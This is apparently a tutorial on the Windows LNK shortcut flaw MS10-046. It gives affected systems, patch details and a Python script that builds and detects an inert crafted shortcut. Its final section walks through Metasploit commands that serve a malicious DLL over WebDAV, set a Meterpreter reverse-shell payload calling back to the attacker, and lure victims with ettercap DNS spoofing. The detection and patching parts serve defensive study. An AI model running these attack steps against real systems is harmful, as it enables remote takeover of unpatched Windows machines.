1. Vulnerability Definition
Windows supports shortcuts, also called LNK files. An LNK file is a reference to a local file; opening the LNK file has the same effect as opening the target that the shortcut points to.
Windows does not process LNK files correctly. A specially crafted LNK file can make Windows automatically execute the code that the shortcut points to: when the shell renders the shortcut's icon, it loads the referenced DLL instead of merely displaying the icon. That code may reside on a USB drive, on a local or remote file system, on an optical drive, or elsewhere. Simply viewing the folder that contains the LNK file in Windows Explorer is enough to trigger the vulnerability; no click is required. Because Windows enables AutoPlay by default, Explorer is opened automatically as soon as a removable device (such as a USB flash drive) is connected. Other applications that display file icons can also serve as carriers for this attack. The affected Windows systems are shown in Table 1 below:
Table 1. Affected Windows systems

Vulnerability name | Affected Windows system types
MS10-046           | Microsoft Windows XP SP3
                   | Microsoft Windows XP SP2
                   | Microsoft Windows Vista SP2
                   | Microsoft Windows Vista SP1
                   | Microsoft Windows Server 2008
                   | Microsoft Windows Server 2008 SP2
                   | Microsoft Windows Server 2008 R2
                   | Microsoft Windows Server 2003 SP2
                   | Microsoft Windows 7
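How the crafted shortcut is laid out, and how a defender can recognise one, as an added example that is not part of the original article: the Python script below builds an inert LNK file whose link-target ID list follows the MS10-046 pattern (a Control Panel folder item followed by an item naming a DLL path) and then scans it. The ShellLinkHeader and ItemID encoding follow the MS-SHLLINK specification; the exact bytes of the Control Panel items are an approximation for illustration, and the UNC path and DLL name are constructed here, not taken from any real sample.

```python
"""Build an inert LNK shaped like an MS10-046 (CVE-2010-2568) shortcut and
scan it.  Added example: the sample file and the DLL path are constructed."""
import struct
import uuid

# GUIDs are stored inside LNK files in little-endian (bytes_le) form.
CLSID_SHELLLINK = uuid.UUID("00021401-0000-0000-C000-000000000046").bytes_le
CLSID_MY_COMPUTER = uuid.UUID("20D04FE0-3AEA-1069-A2D8-08002B30309D").bytes_le
CLSID_CONTROL_PANEL = uuid.UUID("21EC2020-3AEA-1069-A2DD-08002B30309D").bytes_le
HAS_LINK_TARGET_IDLIST = 0x1  # LinkFlags bit A (MS-SHLLINK 2.1.1)
HEADER_SIZE = 0x4C


def build_header(link_flags):
    """76-byte ShellLinkHeader with zeroed timestamps and SW_SHOWNORMAL."""
    return struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, CLSID_SHELLLINK,
                       link_flags, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)


def build_sample(dll_path):
    """LNK whose target ID list is My Computer -> Control Panel -> dll_path.
    The Control Panel item bytes only approximate the real pattern; the
    scanner below keys on the CLSID and the UTF-16LE path, nothing else."""
    items = [
        b"\x1f\x50" + CLSID_MY_COMPUTER,                  # root folder item
        b"\x2e\x80" + CLSID_CONTROL_PANEL,                # Control Panel folder
        b"\x00" * 8 + dll_path.encode("utf-16-le") + b"\x00\x00",  # applet
    ]
    idlist = b"".join(struct.pack("<H", len(i) + 2) + i for i in items)
    idlist += b"\x00\x00"                                 # TerminalID
    return (build_header(HAS_LINK_TARGET_IDLIST)
            + struct.pack("<H", len(idlist)) + idlist)


def parse_idlist(data):
    """Return the ItemID payloads of the LinkTargetIDList, or [] if absent."""
    if len(data) < HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00" \
            or data[4:20] != CLSID_SHELLLINK:
        raise ValueError("not a Windows shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    if not flags & HAS_LINK_TARGET_IDLIST:
        return []
    idlist_size = struct.unpack_from("<H", data, HEADER_SIZE)[0]
    pos, end, items = HEADER_SIZE + 2, HEADER_SIZE + 2 + idlist_size, []
    while pos + 2 <= end:
        size = struct.unpack_from("<H", data, pos)[0]
        if size == 0:                 # TerminalID closes the list
            break
        if size < 2 or pos + size > end:
            raise ValueError("malformed ItemID")
        items.append(data[pos + 2:pos + size])
        pos += size
    return items


def utf16_strings(blob, min_len=4):
    """Printable ASCII runs encoded as UTF-16LE, tried at both alignments."""
    out = []
    for start in (0, 1):
        cur = []
        for i in range(start, len(blob) - 1, 2):
            unit = blob[i] | (blob[i + 1] << 8)
            if 0x20 <= unit < 0x7F:
                cur.append(chr(unit))
                continue
            if len(cur) >= min_len:
                out.append("".join(cur))
            cur = []
        if len(cur) >= min_len:
            out.append("".join(cur))
    return out


def scan_lnk(data):
    """Heuristic: a Control Panel folder in the target ID list followed by an
    item naming a .dll/.cpl outside the Windows directory.  Returns the
    suspicious paths found (empty list for a clean file)."""
    findings, control_panel_seen = [], False
    for item in parse_idlist(data):
        if CLSID_CONTROL_PANEL in item:
            control_panel_seen = True
            continue
        if not control_panel_seen:
            continue
        for text in utf16_strings(item):
            low = text.lower()
            if low.endswith((".dll", ".cpl")) and \
                    not low.startswith(("%systemroot%", "c:\\windows\\")):
                findings.append(text)
    return findings


def scan_file(path):
    with open(path, "rb") as fh:
        return scan_lnk(fh.read())


if __name__ == "__main__":
    # Hypothetical share and DLL name, modelled on a WebDAV-served payload.
    sample = build_sample(r"\\10.23.0.3\owhBPhxMJ\payload.dll")
    print("suspicious:", scan_lnk(sample))
    print("benign:", scan_lnk(build_sample(r"C:\Windows\System32\appwiz.cpl")))
```

scan_file can be pointed at shortcuts collected from removable media or WebDAV caches. The heuristic deliberately ignores Control Panel shortcuts whose applet lives under the Windows directory, which is what legitimate ones look like; it is a triage aid, not a replacement for installing the patch.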
2. Patches
Microsoft has released Security Bulletin MS10-046 and a patch for this vulnerability:
MS10-046: Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198). Its detailed documentation is at the following link:
Http://www.microsoft.com/china/technet/security/bulletin/MS10-046.mspx
This security update resolves a publicly disclosed vulnerability in Windows Shell. The vulnerability could allow remote code execution if the icon of a specially crafted shortcut is displayed. An attacker who successfully exploits it gains the same user rights as the logged-on user, so accounts with fewer rights are affected less than accounts with administrative rights. Besides the automatic updates provided by Windows, third-party tools such as 360 Safeguard can be used to install the patch; on a patched system, update 2286198 (KB2286198) appears in the list of installed updates.
3. Attack Operation
Next, we use Metasploit 3 to exploit the vulnerability. The detailed steps are as follows.
Step 1: Start Metasploit and load the exploit module.
As the attacker, first open Metasploit. Besides launching Metasploit from the menu, you can open any shell in the graphical interface and type the msfconsole command. As shown in Figure 1, the banner reports the number of exploit, auxiliary and payload modules loaded and the framework version.
Search for the module with the following command:
search ms10_046
After pressing Enter, you see the result shown in Figure 2: an exploit module named ms10_046_shortcut_icon_dllloader. Load it with the following command:
use windows/browser/ms10_046_shortcut_icon_dllloader
Before using an exploit module, check which options it requires:
show options
After pressing Enter, the module options are displayed as shown in Figure 3. SRVHOST, SRVPORT and URIPATH are required; SRVPORT (80) and URIPATH (/) already have default values, so only SRVHOST must be set. Leave SRVPORT and URIPATH at their defaults: the module serves the shortcut and the DLL over WebDAV, and the Windows WebDAV client only connects to TCP port 80.
Step 2: Configure the exploit module in Metasploit 3.
Now that the required options are known, set them in turn with the set command. The payload is set to a reverse connection so that the victim connects back to the attacker; to get the enhanced Meterpreter shell, set PAYLOAD to windows/meterpreter/reverse_tcp. The attacker will later use ettercap to DNS-spoof the target into visiting the malicious URL, and the reverse payload must connect back to the attacker, so both SRVHOST and LHOST are set to the attacker's own IP address. Finally, launch the exploit. The commands, entered one after another, are:
set SRVHOST <attacker's own IP address>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker's own IP address>
exploit
As shown in Figure 4, the module starts a web server at http://10.23.0.3:80 backed by a WebDAV share \\10.23.0.3\owhBPhxMJ\. When a victim opens http://10.23.0.3:80 in a browser, the served page points the browser at that UNC path, Windows Explorer opens the share and renders the icon of the crafted LNK file, and Windows loads the DLL from the share. The DLL starts the payload, which connects back to the attacker on LHOST.